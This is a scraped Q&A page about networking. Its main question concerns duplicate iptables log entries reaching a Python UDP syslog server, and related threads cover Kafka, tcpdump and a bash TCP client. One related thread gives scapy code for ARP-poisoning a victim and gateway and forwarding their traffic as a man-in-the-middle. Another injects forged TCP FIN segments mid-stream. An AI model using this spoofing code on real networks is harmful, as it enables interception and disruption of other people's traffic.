duplicate log entries in Python UDP syslog server from iptables - python

I've implemented a basic remote syslog server in Python with the following code:
self.UDPsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.UDPsock.bind(self.addr)
self.UDPsock.settimeout(1)
while self.carryOn:
try:
data = self.UDPsock.recv(self.buf)
print data
except socket.timeout:
pass
I'm using this to receive log messages from my router (Tomato Shibby v108). I'm particularly interested in intercepting messages from my mobile so that I can create a "presence" script.
I originally tried the following iptable entry for testing:
iptables -I FORWARD -s 192.168.2.54 -m limit --limit 1/minute --limit-burst 1 -j LOG
This worked as expected and I would receive messages such as:
<12>Apr 1 21:51:47 kernel: IN=br0 OUT=ppp0 SRC=192.168.2.54 DST=17.158.8.77 LEN=70 TOS=0x00 PREC=0x00 TTL=63 ID=23055 DF PROTO=TCP SPT=60779 DPT=993 WINDOW=65535 RES=0x00 ACK PSH URGP=0 MARK=0x5
However, I don't want to rely on a static IP, so changed the iptable filter to trigger on the MAC address:
iptables -t raw -A PREROUTING -m mac --mac-source SOURCE_MAC -m limit --limit 1/minute --limit-burst 1 -j LOG --log-ip-options
The problem here was that I now received >50 messages per log entry, all duplicates of the form:
<12>Apr 1 19:54:00 kernel: IN=br0 OUT= MAC=DEST_MAC:SOURCE_MAC:08:00 SRC=192.168.2.54 DST=224.0.0.251 LEN=101 TOS=0x00 PREC=0x00 TTL=255 ID=36530 PROTO=UDP SPT=5353 DPT=5353 LEN=81
When I changed the filter to:
iptables -t raw -A PREROUTING -m mac --mac-source SOURCE_MAC -m limit --limit 1/minute --limit-burst 1 -j LOG
It reduced the number of duplicates to 4:
<12>Apr 2 12:21:55 kernel: IN=br0 OUT= MAC=DEST_MAC:SOURCE_MAC:08:00 SRC=192.168.2.54 DST=224.0.0.251 LEN=101 TOS=0x00 PREC=0x00 TTL=255 ID=1384 PROTO=UDP SPT=5353 DPT=5353 LEN=81
Can anyone offer any insight as to why this is happening? I'm assuming there is some sort of "funny" character that is causing this. Can I alter either the iptable entry or the Python program to only receive a single log entry per message?

Related

Confluent_kafka Producer does not publish messages into topic

I tried to install Kafka on my Raspberry. And test it on 'hello-kafka' topic:
~ $ /usr/local/kafka/bin/kafka-console-producer.sh --broker-list localhost:9092 --topic hello-kafka
>Test message 1
>Test message 2
>Test message 3
>^Z
[4]+ Stopped /usr/local/kafka/bin/kafka-console-producer.sh --broker-list localhost:9092 --topic hello-kafka
$ /usr/local/kafka/bin/kafka-console-consumer.sh --bootstrap-server localhost:9092 --topic hello-kafka --from-beginning
Test message 1
Test message 2
Test message 3
^CProcessed a total of 3 messages
Then I tried to check that server works from another machine.
Checking zookeeper:
(venv)$ telnet 192.168.1.10 2181
Trying 192.168.1.10...
Connected to 192.168.1.10.
Escape character is '^]'.
srvr
Zookeeper version: 3.6.0--b4c89dc7f6083829e18fae6e446907ae0b1f22d7, built on 02/25/2020 14:38 GMT
Latency min/avg/max: 0/0.8736/59
Received: 10146
Sent: 10149
Connections: 2
Outstanding: 0
Zxid: 0x96
Mode: standalone
Node count: 139
Connection closed by foreign host.
And Kafka:
(venv) $ telnet 192.168.1.10 9092
Trying 192.168.1.10...
Connected to 192.168.1.10.
Escape character is '^]'.
tets
Connection closed by foreign host.
Then I wrote a Python script:
# -*- coding: utf-8 -*-
from confluent_kafka import Producer
def callback(err, msg):
if err is not None:
print(f'Failed to deliver message: {str(msg)}: {str(err)}')
else:
print(f'Message produced: {str(msg)}')
config = {
'bootstrap.servers': '192.168.1.10:9092'
}
producer = Producer(config)
producer.produce('hello-kafka', value=b"Hello from Python", callback=callback)
producer.poll(5)
There is script output (no any prints):
(venv) $ python kafka-producer.py
(venv) $ python kafka-producer.py
(venv) $
And no new messages in Kafka:
$ /usr/local/kafka/bin/kafka-console-consumer.sh --bootstrap-server localhost:9092 --topic hello-kafka --from-beginning
Test message 1
Test message 2
Test message 3
^CProcessed a total of 3 messages
$ ^C
Somebody can tell me what I am doing wrong?
The correct fix is to update your broker configuration in server.properties to set the advertised listener correctly. If your client cannot resolve raspberrypi then change the advertised listener to something that your client can reach, i.e. the IP address:
advertised.listeners=PLAINTEXT://192.168.1.10:9092
Changing the /etc/hosts file on your client is a workaround that for a test project with a Raspberry Pi is fine, but as a general best practice should be discouraged (because the client will break as soon as it's moved to another machine which doesn't have the /etc/hosts hack)
I turned on log and saw next message:
WARNING:kafka.conn:DNS lookup failed for raspberrypi:9092, exception was [Errno 8] nodename nor servname provided, or not known. Is your advertised.listeners (called advertised.host.name before Kafka 9) correct and resolvable?
ERROR:kafka.conn:DNS lookup failed for raspberrypi:9092 (AddressFamily.AF_UNSPEC)
Then I added to /etc/hosts on client machine next string:
192.168.1.10 raspberrypi
And it completely fix this situation.

TCP packet injection with python (scapy) in the mid-stream

I've been running in the circles with the following scenario:
A client sends GET request, requesting resource of the size of a few full MSS 1460 bytes TCP packets, let's say 6.
How to force scapy to send a TCP segment with a FIN flag BEFORE all packets are delivered by the server ie. after packet 1,2,3,4,5
Was trying the combination of simple curl requests/loop and a python/scapy script:
from scapy.all import * from time import sleep
os.system("iptables -I OUTPUT -p tcp --tcp-flags ALL RST,ACK -j DROP")
os.system("iptables -I OUTPUT -p tcp --tcp-flags ALL RST -j DROP")
def packet(pkt):
if pkt[TCP].flags == 16:
print('ACK packet detected port : ' + str(pkt[TCP].sport) + ' from IP Src : ' + pkt[IP].src)
send(IP(dst=pkt[IP].src, src=pkt[IP].dst)/TCP(dport=pkt[TCP].sport, sport=pkt[TCP].dport,ack=pkt[TCP].seq + 1, flags='F')) sniff(iface="ens160", prn=packet, filter="host 1.1.1.1",count=10)
But segment containing FIN flag arrives always late and out of TCP seq/ack sync.

packet forwarding while ARP poisoning [in Windows]

I wanted to make a "proxy" while ARP poisoning, it works with UDP and if I send a pkt to google I see it on my pc using wireshark
def trick(gate_mac, victim_mac):
'''Tricks the victim and the gate_way, using arp'''
my_mac=ARP()
my_mac=my_mac.hwsrc
sendp(Ether(dst=ETHER_BROADCAST)/ARP(pdst= victim_ip, psrc = gate_ip, hwdst= victim_mac))
sendp(Ether(dst=ETHER_BROADCAST)/ARP(pdst= gate_ip, psrc = victim_ip, hwdst= my_mac))
print "TRICKED"
that is the function i wrote to arp poison, now I want to send all the packets I get from the victim's pc to the router/
but I have no clue how to do packet forwarding.
You can simply activate your OS packet forwarding. If you're running Linux, a simple sysctl -w net.ipv4.ip_forward=1 should do that.
You may also need to let the packets pass your firewall;something like iptables -A FORWARD -s victim_ip -j ACCEPT; iptables -A FORWARD -d victim_ip -j ACCEPT should work (if you're using Linux, again).
Under other OSes, you need to find out how to enable packet forwarding and if needed add firewall rules. If you cannot enable packet forwarding, you can run another Scapy script to forward packets for you. Here is an example:
VICTIM_MAC = "00:01:23:45:67:89"
GATEWAY_MAC = "00:98:76:54:32:10"
_SRC_DST = {
GATEWAY_MAC: VICTIM_MAC,
VICTIM_MAC: GATEWAY_MAC,
}
def forward_pkt(pkt):
pkt[Ether].dst = _SRC_DST.get(pkt[Ether].src, GATEWAY_MAC)
sendp(dst)
sniff(
prn=forward_pkt,
filter="ip and (ether src %s or ether src %s)" % (VICTIM_MAC,
GATEWAY_MAC)
)

TCP client in bash

I have a TCP server written in python and clients in bash.
Client sends data like this
cat file > /dev/tcp/ip/port
and python server sends the response
clientsocket.send('some response')
I can send my data to server, it works fine but when server tries to send response my bash script blocks itself. I tried to use descriptors like below:
exec 3<>/dev/tcp/ip/port
cat file >&3
RESPOND=`cat <&3`
echo $RESPOND
but it does not work (blocks itself)
Thanks in advance
Try using netcat or nc instead. You can set up a server to listen on port 1234 with
command=$(netcat -l 1234)
and you can transmit a message to that host on that port with
echo "message" | nc <host> 1234
or send a file with
nc <host> 1234 < someFile.txt

Skip the IP headers with tcpdump

I'm using tcpdump to debug an SSDP service.
$ sudo tcpdump -Aq udp port 1900
When printing the UDP packets, I'm getting a lot of gibberish before the HTTP headers I presume to be the IP and UDP headers. How do I suppress printing these, and just print the application level data in the packet (which includes the HTTP headers)?
Here's an example, the stuff I don't want is prior to NOTIFY on the second line:
14:41:56.738130 IP www.routerlogin.com.2239 > 239.255.255.250.1900: UDP, length 326
E..b..#................l.N..NOTIFY * HTTP/1.1
HOST: 239.255.255.250:1900
Sadly there are no tcpdump or even tshark shortcuts to do what you want... the best we can do is run STDOUT through a text filter...
Some perl or sed guy will probably come behind me and shorten this, but it gets the job done...
[mpenning#Bucksnort ~]$ sudo tcpdump -Aq udp port 1900 | perl -e 'while ($line=<STDIN>) { if ($line!~/239.255.255.250.+?UDP/) { if ($line=~/(NOTIFY.+)$/) {print "$1\n";} else {print $line;}}}'
NOTIFY * HTTP/1.1
HOST: 239.255.255.250:1900
[mpenning#Bucksnort ~]$
If you add line-breaks, the perl STDIN filter listed above is...
while ($line=<STDIN>) {
if ($line!~/239.255.255.250.+?UDP/) {
if ($line=~/(NOTIFY.+)$/) {
print "$1\n";
} else {
print $line;
}
}
}

Categories